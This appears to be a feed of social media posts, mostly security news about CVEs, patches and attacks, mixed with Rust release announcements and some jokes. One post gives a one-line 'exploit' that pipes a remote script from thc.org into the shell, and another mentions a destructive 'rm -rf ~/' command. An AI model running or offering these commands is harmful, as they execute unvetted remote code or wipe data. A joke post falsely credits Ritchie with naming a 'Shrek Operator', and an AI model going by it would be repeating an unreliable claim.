Privilege Escalation vulnerability in Motors, a #WordPress theme with more than 22,000 sales. This #vulnerability makes it possible for an unauthenticated attacker to change the password of any user

#cpu #fuzz

#Veeam has released security updates today to fix several Veeam Backup & Replication (VBR) flaws, including a #RCE. Tracked as #CVE-2025-23121, this security flaw was reported by security researchers at #watchTowr and #CodeWhite, and it only impacts domain-joined installations.

Ubuntu 25.10's switch to sudo-rs, a Rust-based sudo, shows a profound commitment to enhancing memory safety and system security. This move reflects the growing trend of leveraging Rust. thenewstack.io/ubuntu-25-10... #Ubuntu #Ubuntu2510 #sudoRS #RustLang #MemorySafety #SecureByDesign #Security

🎉 godot-bevy v0.7.0 is out! Release with bug fixes and improvements: ✨ Node Type Markers - Better and more efficient ECS queries ⚡ Fix Timing - Component available in Startup systems 🚀 Performance improvements We also now have a #godotbevy book! 📖 #godotengine #bevyengine #rustlang #gamedev

Good video by Stefan Baumgartner on refactoring with Rust! youtu.be/wuBkzT_3CDU?... #rustlang

3. Steve Klabnik attempted to answer the question we have all been asking, “Is Rust faster than C?” steveklabnik.com/writing/is-r...

#Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization #CVE-2025-49113

#cve-2025-4598 #cve-2025-5054

#Cisco ##vulnerability affecting Cisco IOS XE Wireless Controller Software version 17.12.03 and earlier. The issue was described as an unauthenticated arbitrary file upload, caused by the presence of a hard-coded JSON Web Token (JWT).

#vBulletin #rce #NDay

#o3 #cve-2025-37899 #smb #zeroday

new #rustlang crate drop: iddqd! ID-based maps where keys are borrowed from values. Four maps are included: IdOrdMap, IdHashMap, a bijective (1:1) BiHashMap and a trijective (1:1:1) TriHashMap. At Oxide we've found this pattern to be very useful. iddqd is no-std compatible, too! docs.rs/iddqd

A Chinese APT (UNC5221) is behind recent attacks exploiting an Ivanti zero-day (CVE-2025-4427) This is a known Chinese APT group that seems to be specialized in Ivanti and other Western enterprise products... they have a long list of past zero-days in their name blog.eclecticiq.com/china-nexus-...

A new #critical #vulnerability popped up concerning samlify, a widely adopted #Node.js library for implementing #SAML 2.0 Single Sign-On.

#Motors <= 5.6.67 - Unauthenticated Privilege Escalation Via Password Update/Account Takeover #wordpress #theme

Broadcom-owned #VMware on Tuesday rolled out urgent patches for two sets of flaws that expose its flagship infrastructure software to data leakage, command execution and denial-of-service attacks.

A missing authentication for critical function vulnerability [CWE-306] in #FortiOS, #FortiProxy, and #FortiSwitchManager #CVE-2025-22252

#Google released updates to address 4 issues in its #Chrome web browser, including one for which it said there exists an exploit in the wild.

#Intel, #AMD and #Arm each published Patch Tuesday security advisories to inform customers about vulnerabilities found recently in their products, including ones related to newly disclosed CPU attacks.

#Siemens, #SchneiderElectric and #PhoenixContact have released #ICS security advisories on the May 2025 Patch Tuesday.

#Zoom fixes multiple security bugs, including a #high-risk flaw. Users are urged to update to the latest version released on May 13, 2025. The updates affect both general app versions and Windows-specific builds. For anyone using Zoom, especially on Windows systems, these updates are worth attention

Fortinet released security updates to patch a critical #RCE exploited as a #zero-day targeting FortiVoice enterprise phone systems. Vulnerability tracked as #CVE-2025-32756. As the company explains, successful exploitation can allow rce via maliciously crafted HTTP requests.

Today is #Microsoft May 2025 Patch Tuesday, which includes security updates for 72 flaws, including five actively exploited and two publicly disclosed #zero-day #vulnerabilities www.tripwire.com/state-of-sec...

#SCADA Schneider Electric Modicon Controllers - Successful exploitation of these vulnerabilities may risk execution of unsolicited command on the PLC, which could result in a loss of availability of the controller. www.cisa.gov/news-events/...

How many foreign intel agencies already have spyware on Hegseth’s wife or brother’s phone? Is that the device they used to access Signal? Have they been offered money? Or sex? What secrets could be used for extortion? These are much more relevant NatSec questions than how many pushups can you do.

Fun Fact: the C operator >>= is officially called the "Shrek Operator". Because it's "Shift Right Equal" a.k.a "Shreq". It was named this way because Dennis Ritchie was a huge fan of the Shrek series.

#CVE-2025-30208 #vite A critical vulnerability allowing unauthorized access to sensitive information via the Vite development server.

#elixir #erlang #otp paraxial.io/blog/erlang-...

#rce #erlang A critical vulnerability in the Erlang/OTP SSH, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices. www.bleepingcomputer.com/news/securit...

If you often say "wow I relate to developers" then I have the perfect job for you Developer Relations role just listed! There's also a bunch of other recent additions on the jobs page bsky.social/about/join

#Haskell Language Server 2.10.0.0 release announcement! blog.haskell.org/hls-2-10-0-0/ #LSP #FunctionalProgramming

😶 www.theregister.com/2025/04/16/h...

new FEATRUE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to virustotal.com or any other but the target host. Please don't set BC_LOCK="rm -rf ~/" 🙈 github.com/hackerschoic...

I got a chance to try out @Burp_Suite Burp AI, and it's... honestly really cool 😅 Video showcase where we cruise through a web app scan, crawl and audit, and it rips through findings including an explicit UNION SQL injection vulnerability and more 🤩 youtu.be/v-McepNOrTQ

A critical Remote Code Execution ( #RCE ) vulnerability, #CVE-2025-27520 with a CVSSv3 base score of 9.8, has been recently discovered in #BentoM

This is what American cease-fire looks like 😡🤬

🍿THC member on camera. A first. 😅 30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️ thanks @wwsul.bsky.social www.youtube.com/watch?v=sQVL...

#Fortinet has released a critical security flaw impacting FortiSwitch that could permit an attacker to make unauthorized password changes. An unverified password change in FortiSwitch GUI may allow unauthenticated attacker to modify admin passwords via a specially crafted request. #CVE-2024-48887

Debugging in the terminal isn't difficult anymore 🔥 🛠️ heretek - A gdb TUI dashboard 🐛 Supports viewing registers, hexdump & more! 🚀 Works with remote targets w/o gdbserver 🦀 Written in Rust & built with @ratatui.rs ⭐ GitHub: github.com/wcampbell0x2... #rustlang #ratatui #tui #gdb #debugging

NOBEL PRIZE-WINNING ECONOMIST says:

Ransomware groups will be raising extortion demands 10% due to Tariffs

#cve CVE-2025-30065: Max severity #RCE #Apache #Parquet, impacting all versions <=1.15.0, looks like problem with deserialisation of untrusted data. #cvss v4 score of 10.0. Fixed release of Apache 1.15.1

Ohhh.... Oh no. My dude.

Damn🤯

So if you get notified of lateral movement inside your network.. you should definitely look into that.. expeditiously

😀

New video! Getting Into Cybersecurity - An Interview with @tracketpacer.bsky.social! Tracket has a truly unique job in the industry as a Cybersecurity Payload Specialist for rockets. As you'll learn in this interview, security in space is a lot more complicated! Watch now: youtu.be/5so5e_5sfKs

CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL thc.org/7350pipe)%E2...

Holy shit this is HUGE for Rust adoption in critical systems! Thank you Ferrous Systems! rustfoundation.org/media/ferrou...